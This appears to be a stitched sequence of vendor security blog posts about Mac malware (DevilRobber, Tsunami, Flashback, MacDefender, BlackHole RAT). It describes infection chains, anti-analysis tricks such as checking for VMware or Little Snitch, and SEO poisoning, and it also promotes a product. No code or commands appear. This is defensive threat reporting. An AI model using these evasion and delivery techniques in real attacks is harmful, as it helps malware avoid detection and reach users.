New Malware DevilRobber Grabs Files and Bitcoins, Performs Bitcoin Mining, and More. Malware Intego has discovered a new malware called DevilRobber.A. This malware, which has been found in several applications distributed via BitTorrent trackers, steals data and Bitcoin virtual money, and uses CPU and GPU time on infected Macs to perform “Bitcoin mining.” This malware is complex, and performs many operations. It is a combination of several types of malware: it is a Trojan horse, since it is hidden inside other applications; it is a backdoor, as it opens ports and can accept commands from command and control servers; it is a stealer, as it steals data and Bitcoin virtual money; and it is a spyware, as it sends personal data to remote servers. DevilRobber has been found in a small number of Mac applications that are distributed via BitTorrent trackers, including a popular graphic program. When the doctored application is launched, a preflight script looks for Little Snitch, a network traffic blocker; if Little Snitch is found, the program terminates.
New Variant of DevilRobber Trojan Found in Three Mac Apps. Malware Intego’s malware researchers have found a new variant of the DevilRobber Trojan horse, which they first discovered in October. The latest variant – DevilRobber.D (there have been two others in between) – has been spotted in three Mac applications distributed via BitTorrent trackers. The applications in question are Writer’s Café, EvoCam and Twitterrific. It is important to note that the original applications, obtained from the developers’ web sites, are not infected, but that malicious users distribute infected versions via BitTorrent trackers. If you use these applications, and have purchased them from the developers, you have nothing to worry about. In the meantime, VirusBarrier X6 protects against this Trojan horse.
Intego updated its malware definitions to recognize this malware, but the existing malware definitions, for previous variants, already blocked it. Tsunami Backdoor Can Be Used for Denial of Service Attacks. Malware A new backdoor and hacker tool, Tsunami, has been discovered. This hacker tool seems to be a port of a Linux malware, which has been around for some time, and provides remote access to hackers by listening in on an IRC (Internet relay chat) channel for instructions. Tools like this are often used for distributed denial of service (DDoS) attacks (more on that below). These attacks flood computers with standard network requests, with a goal of overloading them. If a server receives more requests than it can handle, it can slow down, or even crash. The Tsunami backdoor accepts a number of commands, and can change servers, download files, such as updates, and send packets to a specified IP address.
Source code for this backdoor has been publicly available since at least September 2009, and it is trivial to compile this code, using Apple’s XCode, and create a Mac executable. Individual users generally have little to fear from these tools. What is a denial of service attack? OSX/Tsunami Variant Found Dropped by Java 0-Day. Malware A variant of OSX/Tsunami has been found that is rumored to be dropped as a drive-by-download by the new Java 0-day exploit, CVE-2012-4681. This method of infection has not yet been confirmed, but as this OSX malware connects out to the same IP address as the Windows backdoors known to be dropped by CVE-2012-4681, it seems they are at least related incidents. At the time of writing, the JAR file that was purported to be dropping this Trojan has been replaced with a bit of threatening text. It seems like maybe someone knows they’ve been discovered? Either way, this means we have two issues: A malware variant has been discovered, andIt may be spreading via an unpatched Java exploit.
About the Malware The Tsunami family was originally a Linux hacker tool (calling itself Kaiten) created in 2002. This variant is an IRC bot like its predecessor. The Unpatched Java Exploit It’s important to note that this Java 0-day exploit is only a danger to OS X users if you have installed Java 7. SECURITY MEMO: Mac Flashback Trojan Horse Masquerades as Flash Player Installer Package. Malware Malware: OSX/flashback.A Risk: Low; this malware has been found in the wild, and may fool Mac users who don’t have Flash Player installed. However, Intego so far has only one report of this malware, and a sample provided by a user who downloaded it from a malicious web site.
Description: Intego has discovered a new Trojan horse, Flashback, which masquerades as a Flash Player installer. Users visiting certain malicious websites may see a link or an icon to download and install Flash Player. If the user proceeds with the installation procedure, the installer for this Trojan horse will deactivate some network security software (code in this malware specifically targets and deactivates Little Snitch, but has no effect on Intego VirusBarrier X6), and, after installation, will delete the installation package itself.
For now, Intego has analyzed this malware and its installation process. More About the Flashback Trojan Horse. Malware Intego’s security researchers have been examining the code of this new Trojan horse, which we announced yesterday. They have found some interesting elements in the code. First, the code itself is quite sophisticated. The Trojan horse installs a backdoor, at ~/Library/Preferences/Preferences.dylib, which communicates with a remote server, sending and receiving data using RC4 encryption. The backdoor uses the infected Mac’s hardware UUID (a unique identifier) as a user agent, and to identify specific computers. The encryption key used is an MD5 hash of the infected Mac’s UUID. The backdoor is able to download further software, but, for now, we are not seeing this activity. Flashback Trojan Spreading; Mac Users Should Be Wary of Flash Installers.
Malware Following our recent security memo about the Mac Flashback Trojan horse, Intego has seen an increase in the number of Mac users infected by this malware. After publicizing this threat, many users have posted both in the comments on this blog, and on other blogs and forums about having either seen this malware download, or actually installing it. If you end up on a site that is serving this malware, you will see something similar to this: The first things you see are the crashed plugin graphic and the purported error messages. After this, the fake Adobe Flash installer screen pops up, and then the Flashback Trojan horse installation package downloads. At this point, if you have the default Safari settings – which allow “safe” downloads to open automatically – you will see an Installer window open.
This is effective social engineering. For these reasons, Intego is raising the risk level of this malware to medium. New Variant of Flashback Trojan Horse Gets Sneakier. Malware We’ve seen several variants of the Flashback Trojan horse, since Intego first discovered this malware on September 26. The latest version, Flashback.D, has gotten a bit sneakier. First, it checks to see if the user is running Mac OS X in VMware Fusion. If so, it does not execute. It does this because many malware researchers test malware in virtual machines, rather than infect full installations, as it is easier to delete them and start over with clean copies. This means that security researchers analyzing and looking for this malware need to be running regular Macs. Next, the installer for the malware downloads the payload when running the postinstall script. Finally, it no longer installs the easy-to-spot ~/Library/Preferences/Preferences.dylib.
Even if a user removes the above file (UnHackMeBuild), they need to edit Safari’s info.plist file; if not, Safari will look for the backdoor on launch, and, if it is not found, Safari will quit. Flashback Trojan Horse: New Variants with New Features. Malware A security firm has published some information on a new variant of the Flashback Trojan horse, which Intego discovered in September. This new variant, which they are calling Flashback.C is the variant that Intego spotted a week ago, Flashback.D. (It’s not uncommon for different security companies to name variants differently; we may have more variants than other companies.)
Some of the information published about this variant is interesting, notably the fact that it can disable Apple’s Xprotect malware detection system. Some companies have published instructions for manually removing this malware, but it is important to note that such instructions only discuss removing code added to the Safari or Firefox web browsers; given the damage done to the XProtect system, manual repair is impossible. This is the first malware affecting Mac OS X that we have seen that intentionally damages system files. The Flashback Trojan Horse Is Not Taking Time Off for the Holidays. Microsoft “Discovers” Mac Backdoor Olyx; Intego Found it Last Month. Security Memo – MAC Defender Fake Antivirus Program Targets Mac Users. Malware Malware: OSX/MacDefender.A Risk: Low; in the wild, but not very widespread for now Description: Intego has discovered a fake antivirus program called MAC Defender, which targets Mac users via SEO poisoning attacks (web sites set up to take advantage of search engine optimization tricks to get malicious sites to appear at the top of search results).
When a user clicks on certain links after performing a search on a search engine such as Google, they are sent to a web site that displays a fake Windows screen with an animated image showing a malware scan; a window then tells the user that their computer is infected. After this, JavaScript on the page automatically downloads a file. The file downloaded is a compressed ZIP archive, which, if a specific option in a web browser is checked (“Open ‘safe’ files after downloading” in Safari, for example), will open. If the user continues through the installation process, and enters an administrator’s password, the software will be installed. MAC Defender Rogue Anti-Malware Program Attacks Macs via SEO Poisoning. Malware UPDATE: See Intego’s full security memo with detailed information about the MAC Defender fake antivirus. Intego has discovered a rogue anti-malware program called MACDefender, which attacks Macs via SEO poisoning attacks.
When a user clicks on a link after performing a search on a search engine such as Google, this takes them to a web site whose page contains JavaScript that automatically downloads a file. In this case, the file downloaded is a compressed ZIP archive, which, if a specific option in a web browser is checked (Open “safe” files after downloading in Safari, for example), will open. The file is decompressed, and the installer it contains launches presenting a user with the following screen: If the user continues through the installation process, and enters an administrator’s password, the software will be installed.
It is important that users not continue with any unexpected installation of this type. How SEO Poisoning Works and Why You Should Care. Malware In this week’s report of the MacDefender fake antivirus program, we mentioned how this fake antivirus is delivered to users by way of SEO poisoning techniques. In an article on Krebs on Security, journalist Brian Krebs gives some detailed information on how SEO poisoning works, and why it works so well. One of the main targets of SEO poisoning is via Google Image search. In part this is because it is harder to trick out a full web page and get it to appear high in Google’s search results than it is to get images high in the list. Once a user clicks on a thumbnail in the Google Image search results, this sets off the malicious code that can lead to malware being delivered (or, potentially, other types of attacks).
Russian malware researcher Denis Sinegubko goes much deeper into the techniques used in this SEO poisoning, and says: I would call this the most efficient and easy to implement black hat SEO trick to drive search traffic to a site. Who’s Behind the Fake Antiviruses Targeting Mac Users? Malware With yet another version of the Mac Defender fake antivirus discovered, one may wonder who is behind this rash of attacks targeting Mac users. Microsoft published an analysis of the malware and the URLs it uses and suggests it is created by the “Winwebsec” gang. The noted the similarity between web pages used to collect credit card numbers.
And, they also said, In addition to using similar UIs, we noticed that they even share the same payment gateway (this is the site where users are duped into giving the criminals their credit card information). Simply changing the file name from “buy.php” to “mac.php” causes the ‘branding’ to change from the Windows version to the Mac version… Journalist Brian Krebs, in an article on his Krebs on Security blog, claims that ChronoPay, “Russia’s largest online payment processor and something of a pioneer in the rogue anti-virus business,” is involved in this scamware. AppleCare Overwhelmed by Calls About Fake Antivirus. Malware With the MacDefender, MacSecurity and MacProtector fake antivirus spreading through poisoned Google images searches, more and more Mac users are getting stung by this scam. Ed Bott on ZDNet spoke to an AppleCare representative who explained just how widespread this is.
He says, “Our call volume here at AppleCare is 4-5x higher than normal and [the overwhelming majority] of our calls are about this Mac Defender and its aliases.” Our information at Intego is similar. We are contacted by a huge number of customers who are worried about this fake antivirus, and have dozens of samples, including a number of variants of the scareware. Remember, think twice when you enter your administrator’s password, and protect yourself from this and the many other dangers of the Internet with VirusBarrier X6. Tens of Thousands of Mac Users Scammed by Fake Antivirus. Apple Offers Instructions for Removal for Mac Defender Fake Antivirus. Malware Apple has published a technical note regarding the MacDefender (and MacProcter and MacSecurity) fake antivirus, called How to avoid or remove Mac Defender malware. This document explains how to find and remove the fake antivirus, and Apple states that “In the coming days, Apple will deliver a Mac OS X software update that will automatically find and remove Mac Defender malware and its known variants.
The update will also help protect users by providing an explicit warning if they download this malware.” Apple is to be commended for publishing this document, but we have two comments to make. Intego first discovered the Mac Defender fake antivirus on May 2, 2011. Comment Moderator for Popular Blog Shilling for Malware Creators? Apple Issues MacDefender Security Update. New MacDefender Variant Evades Apple’s Malware Detection System. Apple Updates XProtect Malware Definitions for Latest MacDefender Variant. Discovers New Variants of Mac Defender Fake Antivirus. MacDefender / MacSecurity Malware Gets a Bit More Sophisticated. MacDefender, MacSecurity, now MacProtector: Latest Version of Fake Antivirus Targeting Mac Users. SECURITY MEMO – New Mac Defender Variant, MacGuard, Doesn’t Require Password for Installation.
MacDefender Changes Name Again: Now MacShield. BlackHole RAT is Really No Big Deal. Discovers New, Improved BlackHole RAT Variant. BlackHole RAT Evolves Again: New Variant Found.